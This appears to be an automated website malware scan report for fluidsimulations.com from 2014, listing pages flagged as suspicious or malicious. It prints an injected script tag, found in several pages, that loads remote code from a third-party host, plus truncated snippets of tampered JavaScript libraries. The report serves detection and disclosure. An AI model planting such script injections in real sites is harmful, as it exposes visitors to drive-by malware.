Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=fluidsimulations.com
Result: The website is marked by Google as suspicious; visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://fluidsimulations.com/ | 200 OK Content-Length: 20915 Content-Type: text/html | suspicious |
Suspicious code found: <script type="text/javascript">var gwloaded = false;</script> <script src="http://erasoltours.com/logs/HiXFiBqW.php" type="text/javascript"></script>
http://fluidsimulations.com/js/libs/modernizr-2.0.6.min.js | 200 OK Content-Length: 24348 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ;window.Modernizr=function(a,b,c){function I(){e.input=function(a){for(var b=0,c=a.length;b<c;b++)t[a[b]]=a[b]in l;return t}("autocomplete autofocus list placeholder max min multiple pattern required step".split(" ")),e.inputtypes=function(a){for(var d=0,e,f,h,i=a.length;d<i;d++)l.setAttribute("type",f=a[d]),e=l.type!=="text",e&&(l.value=m,l.style.cssText="position:absolute;visibility:hidden;",/^range$/.test(f)&&l.style.WebkitAppearance!==c?(g.appendChild(l),h=b.defaultView /*/0f2490*/ Antivirus reports:
http://fluidsimulations.com/Scripts/swfobject_modified.js | 404 Not Found Content-Length: 1541 Content-Type: text/html | suspicious |
Suspicious code found: <script type="text/javascript">var gwloaded = false;</script> <script src="http://erasoltours.com/logs/HiXFiBqW.php" type="text/javascript"></script>
http://linkhelp.clients.google.com/tbproxy/lh/wm/fixurl.js | 200 OK Content-Length: 47623 Content-Type: text/javascript | clean |
http://fluidsimulations.com/test404page.js | 404 Not Found Content-Length: 1541 Content-Type: text/html | suspicious |
Suspicious code found: <script type="text/javascript">var gwloaded = false;</script> <script src="http://erasoltours.com/logs/HiXFiBqW.php" type="text/javascript"></script>
http://fluidsimulations.com/Scripts/shadowbox.js | 200 OK Content-Length: 56059 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(window,undefined){var S={version:"3.0.3"};var ua=navigator.userAgent.toLowerCase();if(ua.indexOf("windows")>-1||ua.indexOf("win32")>-1){S.isWindows=true}else{if(ua.indexOf("macintosh")>-1||ua.indexOf("mac os x")>-1){S.isMac=true}else{if(ua.indexOf("linux")>-1){S.isLinux=true}}}S.isIE=ua.indexOf("msie")>-1;S.isIE6=ua.indexOf("msie 6")>-1;S.isIE7=ua.indexOf("msie 7")>-1;S.isGecko=ua.indexOf("gecko")>-1&&ua.indexOf("safari")==-1;S.isWebKit=ua.indexOf("ap /*/0f2490*/ Antivirus reports:
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: fluidsimulations.com
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=0, public
Connection: close
Date: Thu, 28 Aug 2014 05:43:21 GMT
Accept-Ranges: none
Server: nginx/1.6.1
Vary: Accept-Encoding
Content-Length: 20915
Content-Type: text/html; charset=utf-8
Expires: Thu, 28 Aug 2014 05:43:21 GMT
Last-Modified: Thu, 31 Oct 2013 10:15:22 GMT
X-UA-Compatible: IE=Edge,chrome=1
...20915 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: fluidsimulations.com
Referer: http://www.google.com/search?q=fluidsimulations.com
Result:
The result is similar to the first query. There are no suspicious redirects found.